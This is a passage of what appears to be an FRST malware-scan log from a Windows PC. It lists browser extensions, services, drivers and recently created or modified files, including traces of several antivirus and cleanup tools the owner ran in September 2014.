CHR HKCU\...\Chrome\Extension: [iigplimlmgilpobjilfbfeilnpiigpgl] - C:\Users\Hogg\AppData\Local\CRE\iigplimlmgilpobjilfbfeilnpiigpgl.crx [2013-08-15]
CHR HKLM-x32\...\Chrome\Extension: [bejnhdlplbjhffionohbdnpcbobfejcc] - C:\Program Files (x86)\Norton Internet Security\Engine\20.5.0.28\Exts\Chrome.crx [2014-05-01]
CHR HKLM-x32\...\Chrome\Extension: [idhngdhcfkoamngbedgpaokgjbnpdiji] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Chrome\Ext\realdownloader.crx [2013-08-14]
CHR HKLM-x32\...\Chrome\Extension: [iigplimlmgilpobjilfbfeilnpiigpgl] - C:\Users\Hogg\AppData\Local\CRE\iigplimlmgilpobjilfbfeilnpiigpgl.crx [2013-08-15]

==================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

S4 DTSRVC; C:\Program Files (x86)\Common Files\Portrait Displays\Shared\DTSRVC.exe [69632 2008-06-24] () [File not signed]
R2 ezSharedSvc; C:\Windows\SysWOW64\ezsvc7.dll [129992 2008-02-03] (EasyBits Sofware AS) [File not signed]
S4 FLEXnet Licensing Service; C:\Program Files (x86)\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe [651720 2009-08-06] (Macrovision Europe Ltd.) [File not signed]
S2 gupdate1ca1c3cefd8b09c; C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [133104 2009-08-13] (Google Inc.)
S4 HP Health Check Service; c:\Program Files (x86)\Hewlett-Packard\HP Health Check\hphc_service.exe [94208 2008-12-04] (Hewlett-Packard) [File not signed]
S4 HPBtnSrv; C:\Program Files (x86)\Hewlett-Packard\HP Easy Backup\HPBtnSrv.exe [192512 2008-09-30] () [File not signed]
R2 hpqddsvc; C:\Program Files (x86)\HP\Digital Imaging\bin\hpqddsvc.dll [135168 2008-10-16] (Hewlett-Packard Co.) [File not signed]
R2 HPSLPSVC; C:\Program Files (x86)\HP\Digital Imaging\bin\HPSLPSVC64.DLL [906752 2008-10-16] (Hewlett-Packard Co.) [File not signed]
S4 IDriverT; C:\Program Files (x86)\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe [73728 2004-10-22] (Macrovision Corporation) [File not signed]
R2 IMFservice; C:\Program Files (x86)\IObit\IObit Malware Fighter\IMFsrv.exe [335168 2013-04-25] (IObit)
S4 LightScribeService; c:\Program Files (x86)\Common Files\LightScribe\LSSrvc.exe [73728 2009-03-17] (Hewlett-Packard Company) [File not signed]
S3 McComponentHostService; C:\Program Files\McAfee Security Scan\3.8.141\McCHSvc.exe [289256 2014-01-15] (McAfee, Inc.)
R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [71680 2008-07-18] (Hewlett-Packard) [File not signed]
R2 NIS; C:\Program Files (x86)\Norton Internet Security\Engine\20.5.0.28\ccSvcHst.exe [144368 2013-05-20] (Symantec Corporation)
R2 RealNetworks Downloader Resolver Service; C:\Program Files (x86)\RealNetworks\RealDownloader\rndlresolversvc.exe [39056 2013-08-14] ()
S4 sprtsvc_ncnetworksdm; C:\Program Files (x86)\NCNETWORKSDM\bin\sprtsvc.exe [206120 2010-06-17] (SupportSoft, Inc.)
S4 tgsrvc_ncnetworksdm; C:\Program Files (x86)\NCNETWORKSDM\bin\tgsrvc.exe [185640 2010-06-17] (SupportSoft, Inc.)
S2 RoxLiveShare9; No ImagePath
S2 vToolbarUpdater18.1.9; C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.9\ToolbarUpdater.exe [X]

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

U5 AppMgmt; C:\Windows\system32\svchost.exe [27648 2008-01-20] (Microsoft Corporation)
S3 ASPI; C:\Windows\SysWOW64\DRIVERS\ASPI32.sys [84832 2002-07-17] (Adaptec) [File not signed]
R1 avgtp; C:\Windows\system32\drivers\avgtpx64.sys [50976 2014-08-11] (AVG Technologies)
S1 Beep; No ImagePath
R1 BHDrvx64; C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_20.2.0.19\Definitions\BASHDefs\20140912.003\BHDrvx64.sys [1586904 2014-09-12] (Symantec Corporation)
R1 ccSet_NIS; C:\Windows\system32\drivers\NISx64\1405000.01C\ccSetx64.sys [169048 2013-04-15] (Symantec Corporation)
S3 cpuz132; No ImagePath
R1 eeCtrl; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys [487216 2014-09-09] (Symantec Corporation)
R3 EraserUtilRebootDrv; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [142640 2014-09-09] (Symantec Corporation)
R3 FileMonitor; C:\Program Files (x86)\IObit\IObit Malware Fighter\Drivers\wlh_amd64\FileMonitor.sys [23048 2013-03-23] (IObit)
S3 hitmanpro36; C:\Windows\system32\drivers\hitmanpro36.sys [30496 2012-09-06] ()
R1 IDSVia64; C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_20.2.0.19\Definitions\IPSDefs\20140912.001\IDSvia64.sys [633560 2014-08-29] (Symantec Corporation)
S3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [122584 2014-09-14] (Malwarebytes Corporation)
R3 NAVENG; C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_20.2.0.19\Definitions\VirusDefs\20140913.021\ENG64.SYS [129752 2014-09-11] (Symantec Corporation)
R3 NAVEX15; C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_20.2.0.19\Definitions\VirusDefs\20140913.021\EX64.SYS [2137304 2014-09-11] (Symantec Corporation)
R3 PdiPorts; C:\Windows\System32\DRIVERS\PdiPorts.sys [20592 2009-06-23] (Portrait Displays, Inc.)
R3 RegFilter; C:\Program Files (x86)\IObit\IObit Malware Fighter\drivers\wlh_amd64\regfilter.sys [34336 2013-03-26] (IObit.com)
S3 RimUsb; No ImagePath
S3 RimVSerPort; C:\Windows\System32\DRIVERS\RimSerial_AMD64.sys [31744 2009-01-09] (Research in Motion Ltd)
S1 SASDIFSV; No ImagePath
S3 SASENUM; No ImagePath
S1 SASKUTIL; No ImagePath
R1 SRTSP; C:\Windows\System32\Drivers\NISx64\1405000.01C\SRTSP64.SYS [796760 2013-05-15] (Symantec Corporation)
R1 SRTSPX; C:\Windows\system32\drivers\NISx64\1405000.01C\SRTSPX64.SYS [36952 2013-03-04] (Symantec Corporation)
R0 SymDS; C:\Windows\System32\drivers\NISx64\1405000.01C\SYMDS64.SYS [493656 2013-05-20] (Symantec Corporation)
R0 SymEFA; C:\Windows\System32\drivers\NISx64\1405000.01C\SYMEFA64.SYS [1139800 2013-05-22] (Symantec Corporation)
R3 SymEvent; C:\Windows\system32\Drivers\SYMEVENT64x86.SYS [177312 2013-06-12] (Symantec Corporation)
R1 SymIRON; C:\Windows\system32\drivers\NISx64\1405000.01C\Ironx64.SYS [224416 2013-03-04] (Symantec Corporation)
R1 SYMTDIv; C:\Windows\System32\Drivers\NISx64\1405000.01C\SYMTDIV.SYS [457304 2013-04-24] (Symantec Corporation)
R3 UrlFilter; C:\Program Files (x86)\IObit\IObit Malware Fighter\drivers\wlh_amd64\UrlFilter.sys [23016 2013-03-26] (IObit.com)
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
S3 IpInIp; system32\DRIVERS\ipinip.sys [X]
S3 NwlnkFlt; system32\DRIVERS\nwlnkflt.sys [X]
S3 NwlnkFwd; system32\DRIVERS\nwlnkfwd.sys [X]
S3 PCDSRVC{F36B3A4C-F95654BD-06000000}_0; \??\c:\program files\pc-doctor for windows\pcdsrvc_x64.pkms [X]

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)

==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-09-15 14:45 - 2014-09-15 14:45 - 02347384 _____ (ESET) C:\Users\Hogg\Desktop\esetsmartinstaller_enu.exe
2014-09-15 14:45 - 2014-09-15 14:45 - 00000000 ____D () C:\Program Files (x86)\ESET
2014-09-15 12:37 - 2014-09-15 12:41 - 00000000 ____D () C:\AdwCleaner
2014-09-15 09:59 - 2014-09-15 09:59 - 00021363 _____ () C:\ComboFix.txt
2014-09-15 08:12 - 2014-09-15 09:59 - 00000000 ____D () C:\Qoobox
2014-09-15 08:12 - 2011-06-26 00:45 - 00256000 _____ () C:\Windows\PEV.exe
2014-09-15 08:12 - 2010-11-07 11:20 - 00208896 _____ () C:\Windows\MBR.exe
2014-09-15 08:12 - 2009-04-19 22:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2014-09-15 08:12 - 2000-08-30 18:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2014-09-15 08:12 - 2000-08-30 18:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2014-09-15 08:12 - 2000-08-30 18:00 - 00098816 _____ () C:\Windows\sed.exe
2014-09-15 08:12 - 2000-08-30 18:00 - 00080412 _____ () C:\Windows\grep.exe
2014-09-15 08:12 - 2000-08-30 18:00 - 00068096 _____ () C:\Windows\zip.exe
2014-09-15 08:10 - 2014-09-15 09:58 - 00000000 ____D () C:\Windows\erdnt
2014-09-15 08:09 - 2014-09-15 08:09 - 05578360 ____R (Swearware) C:\Users\Hogg\Desktop\ComboFix.exe
2014-09-15 08:09 - 2014-09-15 08:09 - 05578360 _____ (Swearware) C:\Users\Hogg\Downloads\ComboFix.exe
2014-09-14 09:18 - 2014-09-15 17:21 - 00000000 ____D () C:\FRST
2014-09-14 09:08 - 2014-09-14 09:08 - 00000000 ____D () C:\ProgramData\WindowsSearch
2014-09-14 08:49 - 2014-09-14 08:49 - 00262144 _____ () C:\Windows\Minidump\Mini091414-01.dmp
2014-09-14 08:48 - 2014-09-14 08:48 - 1521674558 _____ () C:\Windows\MEMORY.DMP
2014-09-14 08:45 - 2014-09-14 08:45 - 00000000 ____D () C:\a400f61a0bb2614026ab8a56ec
2014-09-14 08:36 - 2014-06-26 16:17 - 01389200 _____ (Microsoft Corporation) C:\Windows\system32\icardagt.exe
2014-09-14 08:36 - 2014-06-26 16:17 - 00619664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\icardagt.exe
2014-09-14 08:36 - 2014-06-26 16:17 - 00171152 _____ (Microsoft Corporation) C:\Windows\system32\infocardapi.dll
2014-09-14 08:36 - 2014-06-26 16:17 - 00099480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\infocardapi.dll
2014-09-14 08:36 - 2014-06-26 16:17 - 00008856 _____ (Microsoft Corporation) C:\Windows\SysWOW64\icardres.dll
2014-09-14 08:36 - 2014-06-26 16:17 - 00008848 _____ (Microsoft Corporation) C:\Windows\system32\icardres.dll
2014-09-14 08:35 - 2014-06-05 22:29 - 00035480 _____ (Microsoft Corporation) C:\Windows\system32\TsWpfWrp.exe
2014-09-14 08:35 - 2014-06-05 22:28 - 00035480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TsWpfWrp.exe
2014-09-14 08:10 - 2014-09-14 08:10 - 00000000 ____D () C:\ProgramData\IObit
2014-09-14 08:09 - 2014-09-14 08:09 - 00001010 _____ () C:\Users\Public\Desktop\IObit Malware Fighter.lnk
2014-09-14 08:09 - 2014-09-14 08:09 - 00000000 ____D () C:\Users\Hogg\AppData\Roaming\IObit
2014-09-14 08:09 - 2014-09-14 08:09 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\IObit Malware Fighter
2014-09-14 08:09 - 2014-09-14 08:09 - 00000000 ____D () C:\Program Files (x86)\IObit
2014-09-14 08:02 - 2014-09-14 08:19 - 00000000 ____D () C:\Windows\system32\MRT
2014-09-14 07:56 - 2014-09-14 07:57 - 00002478 _____ () C:\Users\Hogg\Desktop\FSS.txt
2014-09-13 11:01 - 2014-06-06 02:59 - 00506880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qedit.dll
2014-09-13 11:01 - 2014-06-06 01:13 - 00620032 _____ (Microsoft Corporation) C:\Windows\system32\qedit.dll
2014-09-13 11:01 - 2014-03-10 00:26 - 01869824 _____ (Microsoft Corporation) C:\Windows\system32\msxml3.dll
2014-09-13 11:01 - 2014-03-10 00:26 - 01794560 _____ (Microsoft Corporation) C:\Windows\system32\msxml6.dll
2014-09-13 11:01 - 2014-03-09 19:22 - 01401344 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml6.dll
2014-09-13 11:01 - 2014-03-09 19:22 - 01248768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml3.dll
2014-09-13 11:01 - 2013-10-29 22:34 - 00374784 _____ (Microsoft Corporation) C:\Windows\system32\SysFxUI.dll
2014-09-13 11:01 - 2013-10-29 21:55 - 00122368 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\drmk.sys
2014-09-13 11:01 - 2013-10-29 20:33 - 00218112 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\portcls.sys
2014-09-13 11:01 - 2013-10-22 03:31 - 00079360 _____ (Microsoft Corporation) C:\Windows\system32\imagehlp.dll
2014-09-13 11:01 - 2013-10-22 01:19 - 00158208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\imagehlp.dll
2014-09-13 11:01 - 2013-10-10 22:27 - 00144384 _____ (Microsoft Corporation) C:\Windows\system32\wshom.ocx
2014-09-13 11:01 - 2013-10-10 22:26 - 00198656 _____ (Microsoft Corporation) C:\Windows\system32\scrrun.dll
2014-09-13 11:01 - 2013-10-10 20:19 - 00166912 _____ (Microsoft Corporation) C:\Windows\system32\wscript.exe
2014-09-13 11:01 - 2013-10-10 20:19 - 00147968 _____ (Microsoft Corporation) C:\Windows\system32\cscript.exe
2014-09-13 11:01 - 2013-10-10 20:08 - 00172032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\scrrun.dll
2014-09-13 11:01 - 2013-10-10 20:08 - 00131072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wshom.ocx
2014-09-13 11:01 - 2013-10-10 20:08 - 00036864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wshcon.dll
2014-09-13 11:01 - 2013-10-10 18:35 - 00155648 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wscript.exe
2014-09-13 11:01 - 2013-10-10 18:35 - 00135168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cscript.exe
2014-09-13 11:01 - 2013-07-20 04:45 - 00124112 _____ (Microsoft Corporation) C:\Windows\system32\PresentationCFFRasterizerNative_v0300.dll
2014-09-13 11:01 - 2013-07-20 04:44 - 00102608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PresentationCFFRasterizerNative_v0300.dll
2014-09-13 11:01 - 2013-07-07 22:20 - 00172544 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wintrust.dll
2014-09-13 11:01 - 2013-07-07 22:16 - 00992768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\crypt32.dll
2014-09-13 11:01 - 2013-07-07 22:16 - 00133120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsvc.dll
2014-09-13 11:01 - 2013-07-07 22:16 - 00098304 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptnet.dll
2014-09-13 11:01 - 2013-07-07 22:15 - 00218624 _____ (Microsoft Corporation) C:\Windows\system32\wintrust.dll
2014-09-13 11:01 - 2013-07-07 22:12 - 01276416 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll
2014-09-13 11:01 - 2013-07-07 22:12 - 00174592 _____ (Microsoft Corporation) C:\Windows\system32\cryptsvc.dll
2014-09-13 11:01 - 2013-07-07 22:12 - 00132096 _____ (Microsoft Corporation) C:\Windows\system32\cryptnet.dll
2014-09-13 11:01 - 2013-07-03 22:21 - 00532480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\comctl32.dll
2014-09-13 11:01 - 2013-07-03 22:13 - 00633856 _____ (Microsoft Corporation) C:\Windows\system32\comctl32.dll
2014-09-13 11:01 - 2013-06-28 20:25 - 00274944 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbhub.sys
2014-09-13 11:01 - 2013-06-28 20:25 - 00259584 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbport.sys
2014-09-13 11:01 - 2013-06-28 20:25 - 00095744 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbccgp.sys
2014-09-13 11:01 - 2013-06-28 20:25 - 00007552 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbd.sys
2014-09-13 11:01 - 2013-06-26 17:00 - 00785624 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\Wdf01000.sys
2014-09-13 11:01 - 2013-06-26 17:00 - 00054376 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\WdfLdr.sys
2014-09-13 11:01 - 2013-06-26 17:00 - 00009728 _____ (Microsoft Corporation) C:\Windows\system32\Wdfres.dll
2014-09-13 11:01 - 2013-03-07 22:18 - 00451072 _____ (Microsoft Corporation) C:\Windows\system32\winsrv.dll
2014-09-13 11:01 - 2013-03-07 22:17 - 02425344 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2014-09-13 11:01 - 2013-03-07 21:52 - 02067968 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstscax.dll
2014-09-13 11:01 - 2012-11-21 22:22 - 00456192 _____ (Microsoft Corporation) C:\Windows\system32\shlwapi.dll
2014-09-13 11:01 - 2012-11-21 21:54 - 00353280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shlwapi.dll
2014-09-13 11:01 - 2012-11-07 22:26 - 01570816 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll
2014-09-13 11:01 - 2012-11-07 21:48 - 01314816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\quartz.dll
2014-09-13 11:01 - 2011-05-05 08:17 - 00049664 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbehci.sys
2014-09-13 11:01 - 2011-05-05 08:17 - 00029184 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbuhci.sys
2014-09-13 11:00 - 2014-06-02 15:30 - 03137536 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2014-09-13 11:00 - 2014-06-02 15:30 - 00503296 _____ (Microsoft Corporation) C:\Windows\system32\msihnd.dll
2014-09-13 11:00 - 2014-06-02 15:29 - 02280448 _____ (Microsoft Corporation) C:\Windows\system32\authui.dll
2014-09-13 11:00 - 2014-06-02 15:29 - 00045056 _____ (Microsoft Corporation) C:\Windows\system32\appinfo.dll
2014-09-13 11:00 - 2014-06-02 14:29 - 00087552 _____ (Microsoft Corporation) C:\Windows\system32\consent.exe
2014-09-13 11:00 - 2014-06-02 04:31 - 02263552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll
2014-09-13 11:00 - 2014-06-02 04:31 - 00332800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msihnd.dll
2014-09-13 11:00 - 2014-06-02 04:30 - 01993728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\authui.dll
2014-09-13 11:00 - 2014-05-30 01:10 - 00404992 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\afd.sys
2014-09-13 11:00 - 2013-05-01 22:16 - 00686080 _____ (Microsoft Corporation) C:\Windows\system32\win32spl.dll
2014-09-13 11:00 - 2013-05-01 22:04 - 00443904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\win32spl.dll
2014-09-13 11:00 - 2013-05-01 22:03 - 00037376 _____ (Microsoft Corporation) C:\Windows\SysWOW64\printcom.dll
2014-09-13 11:00 - 2012-11-02 04:45 - 00477696 _____ (Microsoft Corporation) C:\Windows\system32\dpnet.dll
2014-09-13 11:00 - 2012-11-02 04:45 - 00068096 _____ (Microsoft Corporation) C:\Windows\system32\dpnathlp.dll
2014-09-13 11:00 - 2012-11-02 04:18 - 00376320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dpnet.dll
2014-09-13 11:00 - 2012-11-02 02:59 - 00026112 _____ (Microsoft Corporation) C:\Windows\system32\dpnsvr.exe
2014-09-13 11:00 - 2012-11-02 02:26 - 00023040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dpnsvr.exe
2014-09-13 10:33 - 2014-09-15 13:07 - 01519284 _____ () C:\Windows\WindowsUpdate.log
2014-09-13 09:00 - 2014-09-13 09:16 - 00000000 ____D () C:\TDSSKiller_Quarantine
2014-09-13 08:43 - 2014-09-15 12:44 - 00000492 _____ () C:\Windows\Tasks\ParetoLogic Update Version3 Startup Task.job
2014-09-13 08:43 - 2014-09-13 08:43 - 00002916 _____ () C:\Windows\System32\Tasks\ParetoLogic Update Version3 Startup Task
2014-09-13 08:02 - 2014-09-13 08:02 - 00000000 ____D () C:\ProgramData\Windows Genuine Advantage
2014-09-13 08:00 - 2014-09-14 14:36 - 00003358 _____ () C:\Windows\System32\Tasks\RealDownloaderRealUpgradeScheduledTaskS-1-5-21-764796802-3477399101-373240229-1000
2014-09-13 08:00 - 2014-09-14 14:36 - 00003222 _____ () C:\Windows\System32\Tasks\RealDownloaderRealUpgradeLogonTaskS-1-5-21-764796802-3477399101-373240229-1000
2014-09-12 19:57 - 2014-09-15 12:43 - 00555242 _____ () C:\Windows\PFRO.log
2014-09-11 19:45 - 2014-09-14 08:01 - 00122584 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-09-11 19:45 - 2014-09-13 10:33 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-09-11 19:45 - 2014-09-11 19:45 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-09-11 19:45 - 2014-05-12 07:26 - 00091352 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-09-11 19:45 - 2014-05-12 07:26 - 00064216 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-09-10 09:12 - 2014-09-10 09:12 - 00001696 _____ () C:\Users\Public\Desktop\iTunes.lnk
2014-09-10 09:12 - 2014-09-10 09:12 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2014-09-10 09:12 - 2014-09-10 09:12 - 00000000 ____D () C:\ProgramData\34BE82C4-E596-4e99-A191-52C6199EBF69
2014-09-10 09:12 - 2014-09-10 09:12 - 00000000 ____D () C:\Program Files\iTunes
2014-09-10 09:12 - 2014-09-10 09:12 - 00000000 ____D () C:\Program Files\iPod
2014-09-10 09:12 - 2014-09-10 09:12 - 00000000 ____D () C:\Program Files (x86)\iTunes
2014-09-10 09:07 - 2014-09-10 09:08 - 00000000 ____D () C:\Users\Hogg\AppData\Local\{13306464-7F21-4CB3-8898-656F1737CBDE}
2014-09-10 09:07 - 2014-09-10 09:07 - 00000000 ____D () C:\Users\Hogg\AppData\Local\{A3C935CF-1510-4F00-9E9C-EF2EEF690822}
2014-09-07 18:53 - 2014-09-07 18:53 - 00131091 _____ () C:\Users\Hogg\Documents\French Powerpoint.pptx
2014-09-01 09:03 - 2014-09-01 09:03 - 00000000 ____D () C:\Users\Hogg\AppData\Local\{1FCB82CA-3656-4F6D-9E00-833069C741DC}
2014-09-01 09:02 - 2014-09-01 09:02 - 00000000 ____D () C:\Users\Hogg\AppData\Local\{5A7A28E0-64E5-4538-BCD1-3606DF5D5886}
2014-08-29 10:04 - 2014-08-29 10:05 - 00000000 ___HD () C:\ProgramData\{698E0848-6D29-4305-80DC-E8D609260CE2}
2014-08-16 10:09 - 2014-09-08 20:24 - 00000000 ____D () C:\Users\Hogg\AppData\Local\Adobe

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-09-15 17:21 - 2014-09-14 09:18 - 00000000 ____D () C:\FRST
2014-09-15 16:46 - 2009-08-13 11:50 - 00000898 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-09-15 16:43 - 2006-11-02 09:22 - 00003616 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0
2014-09-15 16:43 - 2006-11-02 09:22 - 00003616 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0
2014-09-15 16:40 - 2012-05-23 20:30 - 00000924 _____ () C:\Windows\Tasks\FacebookUpdateTaskUserS-1-5-21-764796802-3477399101-373240229-1000UA.job
2014-09-15 16:40 - 2012-05-23 20:30 - 00000902 _____ () C:\Windows\Tasks\FacebookUpdateTaskUserS-1-5-21-764796802-3477399101-373240229-1000Core.job
2014-09-15 16:30 - 2012-12-14 10:04 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-09-15 14:45 - 2014-09-15 14:45 - 02347384 _____ (ESET) C:\Users\Hogg\Desktop\esetsmartinstaller_enu.exe
2014-09-15 14:45 - 2014-09-15 14:45 - 00000000 ____D () C:\Program Files (x86)\ESET
2014-09-15 13:07 - 2014-09-13 10:33 - 01519284 _____ () C:\Windows\WindowsUpdate.log
2014-09-15 12:48 - 2009-08-13 11:38 - 00003986 _____ () C:\Windows\System32\Tasks\Google Software Updater
2014-09-15 12:48 - 2009-08-13 11:38 - 00000880 _____ () C:\Windows\Tasks\Google Software Updater.job
2014-09-15 12:44 - 2014-09-13 08:43 - 00000492 _____ () C:\Windows\Tasks\ParetoLogic Update Version3 Startup Task.job
2014-09-15 12:44 - 2009-08-13 11:50 - 00000894 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-09-15 12:43 - 2014-09-12 19:57 - 00555242 _____ () C:\Windows\PFRO.log
2014-09-15 12:43 - 2013-06-28 12:48 - 00000000 ____D () C:\Users\Hogg\AppData\Roaming\CheckPoint
2014-09-15 12:43 - 2006-11-02 09:42 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-09-15 12:41 - 2014-09-15 12:37 - 00000000 ____D () C:\AdwCleaner
2014-09-15 12:41 - 2006-11-02 09:42 - 00032598 _____ () C:\Windows\Tasks\SCHEDLGU.TXT
2014-09-15 10:29 - 2012-05-24 19:58 - 00000404 ____H () C:\Windows\Tasks\Norton Security Scan for Hogg.job
2014-09-15 09:59 - 2014-09-15 09:59 - 00021363 _____ () C:\ComboFix.txt
2014-09-15 09:59 - 2014-09-15 08:12 - 00000000 ____D () C:\Qoobox
2014-09-15 09:59 - 2006-11-02 07:33 - 00000000 __RHD () C:\Users\Default
2014-09-15 09:58 - 2014-09-15 08:10 - 00000000 ____D () C:\Windows\erdnt
2014-09-15 09:58 - 2006-11-02 06:34 - 00000215 _____ () C:\Windows\system.ini
2014-09-15 09:00 - 2013-03-16 09:14 - 00000000 ____D () C:\Users\Hogg\AppData\Local\CrashDumps
2014-09-15 08:09 - 2014-09-15 08:09 - 05578360 ____R (Swearware) C:\Users\Hogg\Desktop\ComboFix.exe
2014-09-15 08:09 - 2014-09-15 08:09 - 05578360 _____ (Swearware) C:\Users\Hogg\Downloads\ComboFix.exe
2014-09-15 07:52 - 2006-11-02 06:46 - 00770214 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-09-14 20:14 - 2009-08-07 09:49 - 00000000 ____D () C:\ProgramData\Microsoft Help
2014-09-14 18:00 - 2013-06-30 07:53 - 00000494 _____ () C:\Windows\Tasks\Foresight Software Registration3.job
2014-09-14 14:36 - 2014-09-13 08:00 - 00003358 _____ () C:\Windows\System32\Tasks\RealDownloaderRealUpgradeScheduledTaskS-1-5-21-764796802-3477399101-373240229-1000
2014-09-14 14:36 - 2014-09-13 08:00 - 00003222 _____ () C:\Windows\System32\Tasks\RealDownloaderRealUpgradeLogonTaskS-1-5-21-764796802-3477399101-373240229-1000
2014-09-14 09:36 - 2006-11-02 07:33 - 00000000 ____D () C:\Windows\rescache
2014-09-14 09:12 - 2013-10-04 09:35 - 00759982 _____ () C:\Windows\SysWOW64\PerfStringBackup.INI
2014-09-14 09:08 - 2014-09-14 09:08 - 00000000 ____D () C:\ProgramData\WindowsSearch
2014-09-14 08:49 - 2014-09-14 08:49 - 00262144 _____ () C:\Windows\Minidump\Mini091414-01.dmp
2014-09-14 08:49 - 2009-08-17 20:32 - 00000000 ____D () C:\Windows\Minidump
2014-09-14 08:49 - 2009-08-06 10:03 - 00000000 ____D () C:\Windows\SysWOW64\RTCOM
2014-09-14 08:48 - 2014-09-14 08:48 - 1521674558 _____ () C:\Windows\MEMORY.DMP
2014-09-14 08:48 - 2014-04-14 13:35 - 00000000 ____D () C:\Program Files (x86)\Microsoft Silverlight
2014-09-14 08:45 - 2014-09-14 08:45 - 00000000 ____D () C:\a400f61a0bb2614026ab8a56ec
2014-09-14 08:21 - 2014-04-14 13:35 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight
2014-09-14 08:19 - 2014-09-14 08:02 - 00000000 ____D () C:\Windows\system32\MRT
2014-09-14 08:10 - 2014-09-14 08:10 - 00000000 ____D () C:\ProgramData\IObit
2014-09-14 08:09 - 2014-09-14 08:09 - 00001010 _____ () C:\Users\Public\Desktop\IObit Malware Fighter.lnk
2014-09-14 08:09 - 2014-09-14 08:09 - 00000000 ____D () C:\Users\Hogg\AppData\Roaming\IObit
2014-09-14 08:09 - 2014-09-14 08:09 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\IObit Malware Fighter
